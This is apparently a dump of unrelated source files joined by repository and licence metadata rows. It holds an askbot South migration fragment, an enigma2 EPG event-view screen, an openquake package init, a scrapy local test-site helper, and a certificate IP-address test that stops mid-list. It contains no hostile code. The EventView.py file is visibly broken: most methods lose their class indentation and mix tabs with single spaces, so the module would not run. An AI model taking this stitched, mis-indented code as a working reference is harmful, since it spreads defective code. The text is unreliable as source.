            'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_selections'", 'to': "orm['askbot.Tag']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tag_selections'", 'to': "orm['auth.User']"})
        },
        'askbot.question': {
            'Meta': {'object_name': 'Question', 'db_table': "u'question'"},
            'added_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'answer_accepted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'answer_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'questions'", 'to': "orm['auth.User']"}),
            'close_reason': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'closed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'closed_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'closed_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
            'comment_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
            'favorited_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'favorite_questions'", 'through': "'FavoriteQuestion'", 'to': "orm['auth.User']"}),
            'favourite_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'followed_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'followed_questions'", 'to': "orm['auth.User']"}),
            'html': ('django.db.models.fields.TextField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_activity_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_activity_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'last_active_in_questions'", 'to': "orm['auth.User']"}),
            'last_edited_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'last_edited_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'last_edited_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
            'locked': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'locked_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'locked_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locked_questions'", 'null': 'True', 'to': "orm['auth.User']"}),
            'offensive_flag_count': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'summary': ('django.db.models.fields.CharField', [], {'max_length': '180'}),
            'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
            'tags': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'questions'", 'to': "orm['askbot.Tag']"}),
            'text': ('django.db.models.fields.TextField', [], {'null': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
            'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
            'vote_down_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'vote_up_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'wikified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
        },
        'askbot.questionrevision': {
            'Meta': {'object_name': 'QuestionRevision', 'db_table': "u'question_revision'"},
            'author': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'questionrevisions'", 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['askbot.Question']"}),
            'revised_at': ('django.db.models.fields.DateTimeField', [], {}),
            'revision': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'summary': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
            'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
            'text': ('django.db.models.fields.TextField', [], {}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
        },
        'askbot.questionview': {
            'Meta': {'object_name': 'QuestionView'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'viewed'", 'to': "orm['askbot.Question']"}),
            'when': ('django.db.models.fields.DateTimeField', [], {}),
            'who': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'question_views'", 'to': "orm['auth.User']"})
        },
        'askbot.repute': {
            'Meta': {'object_name': 'Repute', 'db_table': "u'repute'"},
            'comment': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'negative': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'positive': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']", 'null': 'True', 'blank': 'True'}),
            'reputation': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
            'reputation_type': ('django.db.models.fields.SmallIntegerField', [], {}),
            'reputed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'askbot.tag': {
            'Meta': {'object_name': 'Tag', 'db_table': "u'tag'"},
            'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_tags'", 'to': "orm['auth.User']"}),
            'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_tags'", 'null': 'True', 'to': "orm['auth.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'used_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
        },
        'askbot.vote': {
            'Meta': {'unique_together': "(('content_type', 'object_id', 'user'),)", 'object_name': 'Vote', 'db_table': "u'vote'"},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'votes'", 'to': "orm['auth.User']"}),
            'vote': ('django.db.models.fields.SmallIntegerField', [], {}),
            'voted_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'})
        },
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True', 'null': 'True'}),
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
            'has_custom_avatar': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'hide_ignored_questions': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
            'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
            'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
            'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
            'tag_filter_setting': ('django.db.models.fields.CharField', [], {'default': "'ignored'", 'max_length': '16'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
            'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
        },
        'contenttypes.contenttype': {
            'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }
    complete_apps = ['askbot']
| gpl-3.0 |
Taapat/enigma2-openpli-vuplus | lib/python/Screens/EventView.py | 7 | 11653 | from Screen import Screen
from Screens.TimerEdit import TimerSanityConflict
from Screens.ChoiceBox import ChoiceBox
from Components.ActionMap import ActionMap
from Components.Button import Button
from Components.Label import Label
from Components.ScrollLabel import ScrollLabel
from Components.PluginComponent import plugins
from Components.TimerList import TimerList
from Components.UsageConfig import preferredTimerPath
from Components.Sources.ServiceEvent import ServiceEvent
from Components.Sources.Event import Event
from enigma import eEPGCache, eTimer, eServiceReference
from RecordTimer import RecordTimerEntry, parseEvent, AFTEREVENT
from TimerEntry import TimerEntry
from Plugins.Plugin import PluginDescriptor
from Tools.BoundFunction import boundFunction
from time import localtime
from Components.config import config
class EventViewBase:
	# Values for self.key_green_choice: what the green button currently does
	# (add a new timer vs. remove/change the existing one).
	ADD_TIMER = 0
	REMOVE_TIMER = 1
	def __init__(self, event, Ref, callback=None, similarEPGCB=None):
		"""Build the common EPG event view widgets.

		event -- the EPG event to display
		Ref -- the service reference object the event belongs to
		callback -- optional browse callback, invoked as
		            callback(setEvent, setService, +1/-1) to page events
		similarEPGCB -- optional callback enabling the 'similar events' search
		"""
		self.similarEPGCB = similarEPGCB
		self.cbFunc = callback
		self.currentService=Ref
		# A non-group service ref with a file path: presumably a recording
		# being played back rather than a live broadcast -- confirm.
		self.isRecording = (not Ref.ref.flags & eServiceReference.isGroup) and Ref.ref.getPath()
		self.event = event
		self["Service"] = ServiceEvent()
		self["Event"] = Event()
		self["epg_description"] = ScrollLabel()
		self["FullDescription"] = ScrollLabel()
		self["datetime"] = Label()
		self["channel"] = Label()
		self["duration"] = Label()
		self["key_red"] = Button("")
		# The similar-events timer exists only when a callback was supplied.
		if similarEPGCB is not None:
			self.SimilarBroadcastTimer = eTimer()
			self.SimilarBroadcastTimer.callback.append(self.getSimilarEvents)
		else:
			self.SimilarBroadcastTimer = None
		self.key_green_choice = self.ADD_TIMER
		# Green button stays blank for recordings (timerAdd is a no-op there).
		if self.isRecording:
			self["key_green"] = Button("")
		else:
			self["key_green"] = Button(_("Add timer"))
		self["key_yellow"] = Button("")
		self["key_blue"] = Button("")
		self["actions"] = ActionMap(["OkCancelActions", "EventViewActions"],
			{
				"cancel": self.close,
				"ok": self.close,
				"pageUp": self.pageUp,
				"pageDown": self.pageDown,
				"prevEvent": self.prevEvent,
				"nextEvent": self.nextEvent,
				"timerAdd": self.timerAdd,
				"openSimilarList": self.openSimilarList,
				"contextMenu": self.doContext,
			})
		# Fill the widgets only once the screen is actually shown.
		self.onShown.append(self.onCreate)
	def onCreate(self):
		# Populate the widgets when the screen is shown. setService/setEvent
		# are provided by the concrete subclass (not visible in this file).
		self.setService(self.currentService)
		self.setEvent(self.event)
def prevEvent(self):
if self.cbFunc is not None:
self.cbFunc(self.setEvent, self.setService, -1)
def nextEvent(self):
if self.cbFunc is not None:
self.cbFunc(self.setEvent, self.setService, +1)
	def removeTimer(self, timer):
		"""Delete *timer* and reset the green button to 'Add timer'."""
		# Clear the after-event action before removing the entry.
		timer.afterEvent = AFTEREVENT.NONE
		self.session.nav.RecordTimer.removeEntry(timer)
		self["key_green"].setText(_("Add timer"))
		self.key_green_choice = self.ADD_TIMER
	def timerAdd(self):
		"""Green button: create a timer for the shown event, or offer
		delete/edit when a matching timer already exists. No-op for
		recordings."""
		if self.isRecording:
			return
		event = self.event
		serviceref = self.currentService
		if event is None:
			return
		eventid = event.getEventId()
		begin = event.getBeginTime()
		end = begin + event.getDuration()
		# Compare service refs on the first 11 ':'-separated fields only
		# (drops any trailing name/path component).
		refstr = ':'.join(serviceref.ref.toString().split(':')[:11])
		isRecordEvent = False
		# Look for an existing timer: same service and event id with
		# overlapping times, or a repeat timer that covers this event.
		for timer in self.session.nav.RecordTimer.timer_list:
			needed_ref = ':'.join(timer.service_ref.ref.toString().split(':')[:11]) == refstr
			if needed_ref and timer.eit == eventid and (begin < timer.begin <= end or timer.begin <= begin <= timer.end):
				isRecordEvent = True
				break
			elif needed_ref and timer.repeated and self.session.nav.RecordTimer.isInRepeatTimer(timer, event):
				isRecordEvent = True
				break
		if isRecordEvent:
			# `timer` is the loop variable left bound by the break above.
			title_text = timer.repeated and _("Attention, this is repeated timer!\n") or ""
			menu = [(_("Delete timer"), "delete"),(_("Edit timer"), "edit")]
			buttons = ["red", "green"]
			def timerAction(choice):
				if choice is not None:
					if choice[1] == "delete":
						self.removeTimer(timer)
					elif choice[1] == "edit":
						self.session.openWithCallback(self.finishedEdit, TimerEntry, timer)
			self.session.openWithCallback(timerAction, ChoiceBox, title=title_text + _("Select action for timer '%s'.") % timer.name, list=menu, keys=buttons)
		else:
			# No matching timer: open the editor on a freshly built entry.
			newEntry = RecordTimerEntry(self.currentService, checkOldTimers = True, dirname = preferredTimerPath(), *parseEvent(self.event))
			self.session.openWithCallback(self.finishedAdd, TimerEntry, newEntry)
def finishedEdit(self, answer=None):
 # Callback from the TimerEntry screen after editing an existing timer.
 # answer is a tuple (confirmed, entry), or None when nothing was
 # supplied.  The parameter default is None, but the original code
 # dereferenced answer[0] unconditionally and raised TypeError for it;
 # guard first so a missing answer is a harmless no-op.
 if answer is None:
  return
 if answer[0]:
  entry = answer[1]
  simulTimerList = self.session.nav.RecordTimer.record(entry)
  if simulTimerList is not None:
   # Conflicts found: try to resolve them by shortening timers that
   # allow their end time to auto-adjust, then re-check.
   for x in simulTimerList:
    if x.setAutoincreaseEnd(entry):
     self.session.nav.RecordTimer.timeChanged(x)
   simulTimerList = self.session.nav.RecordTimer.record(entry)
   if simulTimerList is not None:
    # Still conflicting -- let the user resolve it interactively.
    self.session.openWithCallback(self.finishedEdit, TimerSanityConflict, simulTimerList)
    return
  else:
   self.session.nav.RecordTimer.timeChanged(entry)
 # Update the green key to reflect the (possibly toggled) timer state.
 if len(answer) > 1:
  entry = answer[1]
  if not entry.disabled:
   self["key_green"].setText(_("Change timer"))
   self.key_green_choice = self.REMOVE_TIMER
  else:
   self["key_green"].setText(_("Add timer"))
   self.key_green_choice = self.ADD_TIMER
def finishedAdd(self, answer):
 # Callback from the TimerEntry screen after creating a new timer.
 # answer is (confirmed, entry); on conflicts, first try auto-increase
 # resolution, then small begin/end nudges, then ask the user.
 print "finished add"
 if answer[0]:
  entry = answer[1]
  simulTimerList = self.session.nav.RecordTimer.record(entry)
  if simulTimerList is not None:
   # Shorten auto-increase timers to make room, then re-check.
   for x in simulTimerList:
    if x.setAutoincreaseEnd(entry):
     self.session.nav.RecordTimer.timeChanged(x)
   simulTimerList = self.session.nav.RecordTimer.record(entry)
   if simulTimerList is not None:
    # With no recording margins configured, back-to-back timers can
    # be disentangled by shifting begin/end by 30 seconds.
    if not entry.repeated and not config.recording.margin_before.value and not config.recording.margin_after.value and len(simulTimerList) > 1:
     change_time = False
     conflict_begin = simulTimerList[1].begin
     conflict_end = simulTimerList[1].end
     if conflict_begin == entry.end:
      entry.end -= 30
      change_time = True
     elif entry.begin == conflict_end:
      entry.begin += 30
      change_time = True
     elif entry.begin == conflict_begin and (entry.service_ref and entry.service_ref.ref and entry.service_ref.ref.flags & eServiceReference.isGroup):
      entry.begin += 30
      change_time = True
     if change_time:
      simulTimerList = self.session.nav.RecordTimer.record(entry)
    if simulTimerList is not None:
     # Nudging did not help -- hand the conflict to the user.
     self.session.openWithCallback(self.finishSanityCorrection, TimerSanityConflict, simulTimerList)
  self["key_green"].setText(_("Change timer"))
  self.key_green_choice = self.REMOVE_TIMER
 else:
  # User aborted the TimerEntry dialog.
  self["key_green"].setText(_("Add timer"))
  self.key_green_choice = self.ADD_TIMER
  print "Timeredit aborted"
def finishSanityCorrection(self, answer):
 # TimerSanityConflict resolution funnels into the same handling as a
 # fresh add.
 self.finishedAdd(answer)
def setService(self, service):
 # Show `service` in the Service summary widget and the channel label.
 self.currentService=service
 self["Service"].newService(service.ref)
 if self.isRecording:
  # While viewing a recording the channel label is fixed.
  self["channel"].setText(_("Recording"))
 else:
  name = service.getServiceName()
  if name is not None:
   self["channel"].setText(name)
  else:
   self["channel"].setText(_("unknown service"))
def sort_func(self, x, y):
    """cmp-style comparator ordering records by their second field.

    Used with Python 2's list.sort(cmp); returns -1, 0 or 1.
    """
    lhs, rhs = x[1], y[1]
    # Classic cmp() idiom: boolean subtraction yields -1/0/1.
    return (lhs > rhs) - (lhs < rhs)
def setEvent(self, event):
 # Fill all event widgets (title, description, times, duration) for
 # `event`, kick off the similar-broadcast search, and sync the green
 # key with any existing timer for this event.
 self.event = event
 # NOTE(review): the widget is updated even for event=None, presumably
 # to clear it, before the early return below -- confirm intent.
 self["Event"].newEvent(event)
 if event is None:
  return
 text = event.getEventName()
 short = event.getShortDescription()
 ext = event.getExtendedDescription()
 # Avoid repeating the title when the short description duplicates it.
 if short == text:
  short = ""
 if short and ext:
  ext = short + "\n\n" + ext
 elif short:
  ext = short
 if text and ext:
  text += "\n\n"
 text += ext
 self.setTitle(event.getEventName())
 self["epg_description"].setText(text)
 self["FullDescription"].setText(ext)
 self["datetime"].setText(event.getBeginTimeString())
 self["duration"].setText(_("%d min")%(event.getDuration()/60))
 # Red key stays blank until getSimilarEvents finds matches.
 self["key_red"].setText("")
 if self.SimilarBroadcastTimer is not None:
  # Deferred search so the UI paints before the EPG query runs.
  self.SimilarBroadcastTimer.start(400,True)
 serviceref = self.currentService
 eventid = self.event.getEventId()
 begin = event.getBeginTime()
 end = begin + event.getDuration()
 # Same truncated-reference matching as timerAdd: first 11 fields only.
 refstr = ':'.join(serviceref.ref.toString().split(':')[:11])
 isRecordEvent = False
 for timer in self.session.nav.RecordTimer.timer_list:
  needed_ref = ':'.join(timer.service_ref.ref.toString().split(':')[:11]) == refstr
  if needed_ref and (timer.eit == eventid and (begin < timer.begin <= end or timer.begin <= begin <= timer.end) or timer.repeated and self.session.nav.RecordTimer.isInRepeatTimer(timer, event)):
   isRecordEvent = True
   break
 # Only touch the green key when its state actually changes.
 if isRecordEvent and self.key_green_choice != self.REMOVE_TIMER:
  self["key_green"].setText(_("Change timer"))
  self.key_green_choice = self.REMOVE_TIMER
 elif not isRecordEvent and self.key_green_choice != self.ADD_TIMER:
  self["key_green"].setText(_("Add timer"))
  self.key_green_choice = self.ADD_TIMER
def pageUp(self):
    # Scroll both description widgets up one page in lockstep.
    for widget in ("epg_description", "FullDescription"):
        self[widget].pageUp()
def pageDown(self):
    # Scroll both description widgets down one page in lockstep.
    for widget in ("epg_description", "FullDescription"):
        self[widget].pageDown()
def getSimilarEvents(self):
 # search similar broadcastings
 # Query the EPG cache for broadcasts similar to the current event and
 # append them (sorted by begin time) to both description widgets;
 # enables the red "Similar" key when matches exist.
 if not self.event:
  return
 refstr = str(self.currentService)
 id = self.event.getEventId()
 epgcache = eEPGCache.getInstance()
 # 'NB': name + begin time, up to 100 results.
 ret = epgcache.search(('NB', 100, eEPGCache.SIMILAR_BROADCASTINGS_SEARCH, refstr, id))
 if ret is not None:
  text = '\n\n' + _('Similar broadcasts:')
  # Python 2 only: list.sort with a cmp function (see sort_func).
  ret.sort(self.sort_func)
  for x in ret:
   # x is (event name, begin timestamp); format as d.m.y, hh:mm.
   t = localtime(x[1])
   text += '\n%d.%d.%d, %2d:%02d - %s'%(t[2], t[1], t[0], t[3], t[4], x[0])
  descr = self["epg_description"]
  descr.setText(descr.getText()+text)
  descr = self["FullDescription"]
  descr.setText(descr.getText()+text)
  self["key_red"].setText(_("Similar"))
def openSimilarList(self):
    # Red-key handler: only active when a similar-events callback was
    # supplied and getSimilarEvents enabled the red key label.
    if self.similarEPGCB is None or not self["key_red"].getText():
        return
    eventid = self.event and self.event.getEventId()
    service = str(self.currentService)
    if eventid is not None:
        self.similarEPGCB(eventid, service)
def doContext(self):
 # Context-menu handler: collect EVENTINFO plugins that do not demand a
 # service list or a selected event, then run the single candidate
 # directly or present a ChoiceBox for several.
 if self.event:
  text = _("Select action")
  # Python 2 only: func_code/co_varnames introspection filters out
  # plugins whose __call__ expects extra arguments we cannot supply.
  menu = [(p.name, boundFunction(self.runPlugin, p)) for p in plugins.getPlugins(where = PluginDescriptor.WHERE_EVENTINFO) \
   if 'servicelist' not in p.__call__.func_code.co_varnames \
   if 'selectedevent' not in p.__call__.func_code.co_varnames ]
  if len(menu) == 1:
   menu and menu[0][1]()
  elif len(menu) > 1:
   def boxAction(choice):
    # ChoiceBox callback: run the picked plugin, ignore cancel.
    if choice:
     choice[1]()
   text += ": %s" % self.event.getEventName()
   self.session.openWithCallback(boxAction, ChoiceBox, title=text, list=menu, windowTitle=_("Event view context menu"))
def runPlugin(self, plugin):
 # Invoke an EVENTINFO plugin with the currently shown service/event.
 plugin(session=self.session, service=self.currentService, event=self.event, eventName=self.event.getEventName())
class EventViewSimple(Screen, EventViewBase):
 """Plain event detail screen: EventViewBase behaviour with no extra keys."""
 def __init__(self, session, Event, Ref, callback=None, similarEPGCB=None):
  Screen.__init__(self, session)
  # Reuse the shared "EventView" skin rather than defining its own.
  self.skinName = "EventView"
  EventViewBase.__init__(self, Event, Ref, callback, similarEPGCB)
class EventViewEPGSelect(Screen, EventViewBase):
 """Event detail screen with yellow/blue keys to jump into single/multi EPG.

 singleEPGCB/multiEPGCB are invoked after hiding and closing this screen.
 """
 def __init__(self, session, Event, Ref, callback=None, singleEPGCB=None, multiEPGCB=None, similarEPGCB=None):
  Screen.__init__(self, session)
  # Reuse the shared "EventView" skin rather than defining its own.
  self.skinName = "EventView"
  self.singleEPGCB = singleEPGCB
  self.multiEPGCB = multiEPGCB
  EventViewBase.__init__(self, Event, Ref, callback, similarEPGCB)
  self["key_yellow"].setText(_("Single EPG"))
  self["key_blue"].setText(_("Multi EPG"))
  self["epgactions"] = ActionMap(["EventViewEPGActions"],
   {
    "openSingleServiceEPG": self.openSingleEPG,
    "openMultiServiceEPG": self.openMultiEPG,
   })
 def openSingleEPG(self):
  # Yellow key: leave this screen and open the single-service EPG.
  self.hide()
  self.singleEPGCB()
  self.close()
 def openMultiEPG(self):
  # Blue key: leave this screen and open the multi-service EPG.
  self.hide()
  self.multiEPGCB()
  self.close()
| gpl-2.0 |
larsbutler/oq-hazardlib | openquake/hazardlib/calc/__init__.py | 4 | 1250 | # The Hazard Library
# Copyright (C) 2012-2014, GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Package :mod:`openquake.hazardlib.calc` contains hazard calculator modules
and utilities for them, such as :mod:`~openquake.hazardlib.calc.filters`.
"""
from openquake.hazardlib.calc.hazard_curve import hazard_curves
from openquake.hazardlib.calc.gmf import ground_motion_fields
from openquake.hazardlib.calc.stochastic import stochastic_event_set
# from disagg we want to import main calc function
# as well as all the pmf extractors
from openquake.hazardlib.calc.disagg import *
from openquake.hazardlib.calc import filters
| agpl-3.0 |
Lucifer-Kim/scrapy | scrapy/utils/testsite.py | 93 | 1232 | from __future__ import print_function
from six.moves.urllib.parse import urljoin
from twisted.internet import reactor
from twisted.web import server, resource, static, util
class SiteTest(object):
    """Test mixin that runs a local Twisted web site for each test.

    Provides self.baseurl and a url() helper resolving paths against it.
    """

    def setUp(self):
        super(SiteTest, self).setUp()
        # Port 0 lets the OS pick a free port; bind to loopback only.
        self.site = reactor.listenTCP(0, test_site(), interface="127.0.0.1")
        port = self.site.getHost().port
        self.baseurl = "http://localhost:%d/" % port

    def tearDown(self):
        super(SiteTest, self).tearDown()
        self.site.stopListening()

    def url(self, path):
        """Return *path* resolved against the test server's base URL."""
        return urljoin(self.baseurl, path)
def test_site():
    """Build the Twisted Site serving the canned test resources."""
    root = resource.Resource()
    # (url segment, resource) pairs registered below in order.
    children = [
        ("text", static.Data("Works", "text/plain")),
        ("html", static.Data("<body><p class='one'>Works</p><p class='two'>World</p></body>", "text/html")),
        ("enc-gb18030", static.Data("<p>gb18030 encoding</p>", "text/html; charset=gb18030")),
        ("redirect", util.Redirect("/redirected")),
        ("redirected", static.Data("Redirected here", "text/plain")),
    ]
    for segment, child in children:
        root.putChild(segment, child)
    return server.Site(root)
# Manual smoke test: serve the test site on a random local port until
# interrupted, printing the URL to visit.
if __name__ == '__main__':
 port = reactor.listenTCP(0, test_site(), interface="127.0.0.1")
 print("http://localhost:%d/" % port.getHost().port)
 reactor.run()
| bsd-3-clause |
dobbymoodge/origin | vendor/github.com/google/certificate-transparency/python/ct/cert_analysis/ip_addresses_test.py | 18 | 2888 | #!/usr/bin/env python
import unittest
import mock
from ct.cert_analysis import base_check_test
from ct.cert_analysis import ip_addresses
from ct.crypto import cert
class IpAddressesTest(base_check_test.BaseCheckTest):
    """Tests for the ip_addresses certificate-analysis checks."""

    class FakeIPAddress(object):
        """Minimal stand-in exposing only the as_octets() accessor."""
        def __init__(self, *octets):
            self._octets = octets

        def as_octets(self):
            return self._octets

    def _mock_cert(self, addresses):
        """Return a mock certificate whose subject IPs are `addresses`."""
        certificate = mock.MagicMock()
        certificate.subject_ip_addresses = mock.Mock(
            return_value=[self.FakeIPAddress(*octets)
                          for octets in addresses])
        return certificate

    def test_corrupt_extension(self):
        certificate = mock.MagicMock()
        certificate.subject_ip_addresses = mock.Mock(
            side_effect=cert.CertificateError("Boom!"))
        result = ip_addresses.CheckCorruptIpAddresses().check(certificate)
        self.assertObservationIn(ip_addresses.CorruptIPAddress(), result)

    def test_private_ipv4(self):
        certificate = self._mock_cert([(10, 0, 0, 5),
                                       (192, 168, 0, 1),
                                       (172, 16, 5, 5),
                                       (172, 31, 3, 3),
                                       (172, 27, 42, 4)])
        result = ip_addresses.CheckPrivateIpAddresses().check(certificate)
        self.assertEqual(len(result), 5)

    def test_not_private_ipv4(self):
        certificate = self._mock_cert([(11, 0, 0, 5),
